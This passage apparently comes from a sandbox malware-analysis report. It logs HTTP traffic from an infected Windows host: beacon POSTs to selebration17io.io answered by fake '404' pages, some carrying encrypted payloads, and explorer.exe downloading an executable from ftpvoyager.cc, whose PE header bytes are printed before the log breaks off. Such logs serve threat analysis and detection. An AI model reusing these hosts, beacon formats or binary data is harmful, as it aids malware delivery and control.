7d b1 1d 32 12 51 8c f0 0e 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 0e a1 54 17 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 1e 54 ab 1e a6 ea 08 ee c3 ce 57 a3 04 1d 85 1f d6 5c 6d 91 2c db 03 f1 f0 61 af 03 5a e5 1f e4 97 7d 10 99 9c 8b de b0 93 49 98 8a 4b 72 66 74 f9 50 6d 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a 8f f6 6b e3 e3 f8 64 37 00 86 cb 1e c9 20 f3 78 72 ef 3f be 15 45 cd 4b 3f f4 56 7e 4d a0 5a d4 11 eb ac 8c 5c 6e 0f ca 80 b4 35 2e 9f 9c e4 ec 27 98 c3 b3 27 a8 ca d4 5d 52 52 43 9c 5f 29 62 0a 3a 1d f8 6a aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f c8 9f 19 e8 8b 29 1c a8 65 a9 77 b3 04 b9 81 19 01 88 b9 9b df 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 88 43 d9 ed f9 bc 53 dc 22 9e 8b 18 57 df 0d 7c 42 46 86 96 7f d8 b0 27 9d df 69 42 56 60 e8 9e 73 0f 3b 65 a2 25 3b 78 60 38 4b 5f d6 a6 bd 78 fe b1 b6 01 6d 18 5e 0a 7c e9 f3 32 62 c2 39 16 12 39 75 e8 17 14 b4 25 ae df 4d 1b fb 10 54 5a 17 24 e7 a5 e9 4c 1b 4e 11 b4 e5 f9 e4 39 0a 02 6e f1 fd 60 1a 23 6a da 24 eb 53 72 5e 35 32 b5 01 82 9d 35 c3 01 69 44 46 7a 43 bc e9 56 63 93 45 e1 3d 0f 2b 63 68 06 73 10 3a 99 89 ef f5 fe d6 a4 23 c8 15 c5 8d 4a a7 94 85 65 69 1d d4 de af 84 ed 47 e7 a2 3a 84 92 3c a2 e3 86 98 42 66 d2 1f b6 bc ac f5 50 24 d1 e4 e5 e0 c5 95 3f 9f ad aa 7a 65 fa 8e 57 90 ae 0f 27 e9 dd 9a ac aa e5 be 48 63 3c ce f9 9f 82 a4 94 8d bf b0 a2 f2 fe 98 a9 4c 6b 76 68 a6 df 43 d0 18 b5 90 4e a6 fe 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 0e bf 9d 63 11 58 82 37 88 38 17 69 66 0b 11 e1 db 1c 04 b8 a5 be 0e 18 72 d7 a8 67 44 2e 1c f9 eb 98 7e 08 60 fe 96 a3 d8 3b d4 91 22 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d 21 81 b9 d0 b5 e3 02 45 3d 79 47 2d b4 0f ce 18 1c f0 58 fe cd f6 b0 8c 2a 26 58 c4 22 09 af ad 56 43 7c 2a 58 b2 dd dd 8c fd 2d 02 3d 92 bd 9d a5 13 1a 54 06 2e 10 72 ee b9 cc a5 e4 47 29 05 ce a3 22 40 59 ae 76 02 89 c6 a7 a4 42
                                                                                                                                                                    Data Ascii: 1f66`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*jH75sqO*3`sE|WD<PQf}(*jC\SMU`T[Ui XJ3Ob>!K:V/#RSSR+{~E(LOa~i~_zW,%Qa>|(HkJ{/a]F4L3l!|~q JO;yg4VL3r#1yr+LCCOUiFU=hU@Wd{9&',=fJ}2QKk^To)2([TW\m,aZ}IKrftPmCbz+z(Fzkd7 xr?EK?V~MZ\n5.'']RRC_)b:j3%}/)ewRLEsCS"W|BF'iBV`s;e%;x`8K_xm^|2b99u%MTZ$LN9n`#j$Sr^525iDFzCVcE=+chs:#JeiG:<BfP$?zeW'Hc<LkvhCNN/KtO$tlcX78ifrgD.~`;"Gd-0c=!E=yG-X*&X"VC|*X-=T.rG)"@YvB
                                                                                                                                                                    Jan 7, 2024 05:29:57.158694983 CET288OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://cjdvndnfdroykqao.net/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 129
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Jan 7, 2024 05:29:57.370498896 CET604INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:29:57 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                                                                                                                                                                    Jan 7, 2024 05:29:57.373147964 CET286OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://uuaysnecntyjjh.com/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 132
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Jan 7, 2024 05:29:57.583707094 CET604INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:29:57 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                                                                                                                                                                    Jan 7, 2024 05:29:57.587569952 CET288OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://glpsriaubfgujiwi.net/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 123
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Jan 7, 2024 05:29:57.798913002 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:29:57 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 35 8f e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 12 90 d0 72 0b 0f c6 1b a7 5f 3d d7 7b cc e1 14 ea 67 d3 34 93 f2 0c 1d 79 d3 58 97 44 3c e7 d4 c2 c3 60 a2 fd 14 83 a3 d9 9e 6b da df 3e 85 19 5c 54 6e 99 94 6d e9 cf 7e f1 bb 3b 65 b5 0f a4 45 2a 83 40 41 fd 99 b2 56 e6 83 bd 71 5e cd 37 c4 70 a0 57 96 29 8c ad 1a 3a b5 d8 91 2a df bd 8a 73 42 dc 96 34 1f e7 e5 cd 97 f3 5d 0c 87 b4 77 c0 ca 79 59 02 86 cc 7f f9 5e 9d f2 4e 23 18 e2 f9 7e 3c 48 06 c7 f4 32 15 a2 75 a8 03 9b 22 99 d5 1d 47 ed 75 0a 12 3b d0 7a 7f f3 54 7b 7d a5 44 c9 a0 c1 b9 dd 7a 5d d5 4e 19 ac 2d 93 a9 6d c5 61 f3 be 25 51 61 9a d4 3e 7c 68 28 ca 49 60 a0 ce 6e 9a ab ff ec 9e ec 12 ae 87 2f bd 61 1d 98 5c bf 46 24 fd f8 12 ac 31 6c 29 7c 4a 8d c7 ed e4 0e a4 e9 7e 71 ee 80 f4 1a 68 9b 4a d8 1c ae cd 4f 3b 79 82 ae 9c 37 6c 4e 75 52 ad f3 30 02 2e b9 70 ee 8c a2 b2 75 1e 31 79 82 90 f7 df f5 fc e7 72 3b 4c 80 d0 12 f9 13 73 11 bb d6 af 31 3c 27 d4 69 b7 9f bb 8f cf 46 bd 48 15 ac af 9b b2 57 bc 26 ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 84 2e 42 23 83 c7 9b 54 ca 3e 66 c9 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 5f 70 a2 90 56 a1 54 55 b5 a3 b4 1b 2f c3 cb 29 32 28 e7 5b 1e 54 ab 1e 26 bd 13 ee 37 cf 57 a3 4c 1d 85 1f d4 5c 68 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 a6 7d 10 9f 3e cd bc c8 ed 07 99 8a 92 43 7d 74 79 40 6d 43 cc 11 89 8b e1 66 7a d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 f2 ae 46 7f fe d3 ce 1b fb 97 6b e3 97 40 d9 37 00 40 e1 1c c9 b2 f5 52 48 68 38 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 43 eb ac d8 58 0a 6e be e3 cf 25 2e 47 98 a6 ee 35 f8 c0 a7 0d ae ca d4 5f 17 40 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 81 c4 a1 f3 0b 0f a9 db a0 e8 c8 2f 4a 6b 09 e8 8b 53 75 ae 18 32 77 b3 0e d7 82 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 53 e8 b8 0c 6b 93 95 1f e2 20 d9 ed 53 aa 52 dc 1a 9e e7 1a 57 3b 01 7d 42 cd 82 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 33 0f b6 27 c4 4e 78 12 15 41 07 5f d6 26 ba 78 fe 91 e2 9a 6d 98 5c 32 d0 01 f0 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 11 20 b2 7d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a7 90 4e b0 d4 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 1d bf 9d 69 13 23 92 37 88 32 78 7e 66 0b 1b b9 fb 35 51 ed 00 e4 26 0d 72 d7 a2 65 3f 3f 1c f9 e1 f7 66 08 60 f4 ce 89 ca 3b d4 85 08 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d 54 a3 c7 1d 33 7a b8 2b 96 7b cc dc 02 eb 67 c2 91 30 b5 82 cf f0 f5 c2 f3 ea 94 09 cb d3 61 1a 13 c8 90 4a 4b 0b 07 b3 02 8e c1 b3 21 89 31 a2 49 fb 3b 12 03 2e 4d b1 04 61 38 62 28 8b e5 37 8d 2c ce f9 82 a4 2c 02 61 df f8 81 55
                                                                                                                                                                    Data Ascii: 1f66`@0,xO}q4 IJ%9Wd8IkDJ8P>5%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*r_={g4yXD<`k>\Tnm~;eE*@AVq^7pW):*sB4]wyY^N#~<H2u"Gu;zT{}Dz]N-ma%Qa>|h(I`n/a\F$1l)|J~qhJO;y7lNuR0.pu1yr;Ls1<'iFHW&hU@Wd{9f(.B#T>fd0QpKk_pVTU/)2([T&7WL\h),^[}>C}ty@mCfz+z(Fk@7@RHh8M?~MpCXn%.G5_@CUb:@/JkSu2wRSk SRW;}B.'<BV`3'NxA_&xm\22B9G }TZ\Z_i9*nX%Sr^3m~CvbE.`:2nJeig:X]y7gT$:jqw'eSUHc6Zkvbi2NN/KtO$tli#72x~f5Q&re??f`;Gd-0c=T3z+{g0aJK!1I;.Ma8b(7,,aU
                                                                                                                                                                    Jan 7, 2024 05:30:00.265594006 CET284OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://gbiinvopfmdt.com/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 135
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Jan 7, 2024 05:30:00.476377010 CET604INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:00 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                                                                                                                                                                    Jan 7, 2024 05:30:00.749524117 CET286OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://slivtqoptwvrgq.com/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Jan 7, 2024 05:30:00.960870028 CET234INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:00 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 32 65 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 1b 81 01 c7 5b cb f7 07 a6 3b bf 29 46 16 31 e4 76 4b 6d 82 5c 2c 13 37 c1 a5 94 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 2eUys/~(`:[;)F1vKm\,70
                                                                                                                                                                    Jan 7, 2024 05:30:07.315685987 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://ueeebefwwpm.com/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 285
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Jan 7, 2024 05:30:07.527610064 CET604INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:07 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                                                                                                                                                                    Jan 7, 2024 05:30:07.595432043 CET288OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://fcgipjpvvtltjpvp.org/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 137
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Jan 7, 2024 05:30:07.807806015 CET242INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:07 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 33 36 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 15 80 16 de 1a c6 f9 10 b7 2c f0 27 49 50 31 f5 28 07 6b 81 17 26 19 7d d4 bf cb a8 c0 27 91 28 2f 40 35 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 36Uys/~(`:,'IP1(k&}'(/@50


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    1192.168.2.44977191.104.83.7802580C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Jan 7, 2024 05:30:04.854701042 CET164OUTGET /ftp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Host: ftpvoyager.cc
                                                                                                                                                                    Jan 7, 2024 05:30:05.175225019 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.24.0
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:05 GMT
                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Description: File Transfer
                                                                                                                                                                    Content-Disposition: attachment; filename=0c5f04c7.exe
                                                                                                                                                                    Content-Transfer-Encoding: binary
                                                                                                                                                                    Expires: 0
                                                                                                                                                                    Cache-Control: must-revalidate
                                                                                                                                                                    Pragma: public
                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 28 38 65 ec 6c 59 0b bf 6c 59 0b bf 6c 59 0b bf 72 0b 9e bf 7d 59 0b bf 72 0b 88 bf 3e 59 0b bf 72 0b 8f bf 48 59 0b bf 4b 9f 70 bf 6b 59 0b bf 6c 59 0a bf 0b 59 0b bf 72 0b 81 bf 6d 59 0b bf 72 0b 9f bf 6d 59 0b bf 72 0b 9a bf 6d 59 0b bf 52 69 63 68 6c 59 0b bf 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a9 36 85 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 64 02 00 00 7a 02 00 00 00 00 00 23 22 00 00 00 10 00 00 00 80 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 9e 60 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc b6 02 00 50 00 00 00 00 a0 03 00 b8 